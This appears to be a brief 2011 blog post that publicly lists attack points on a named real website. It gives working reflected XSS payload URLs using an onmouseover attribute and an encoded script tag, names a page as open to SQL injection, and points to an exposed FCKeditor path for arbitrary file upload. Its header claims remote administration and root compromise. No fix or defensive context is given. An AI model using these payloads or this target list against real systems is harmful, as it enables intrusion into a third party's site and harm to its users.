Tuesday, 31 May 2011

http://www.asiabenevento.it | xss, arbitrary file upload, sql injection, remote administration, root compromise

-XSS-
http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla="
http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E

-sql inj-
http://www.asiabenevento.it/asiastrade/strade.php

-arbitrary file upload-
http://www.asiabenevento.it/fckeditor/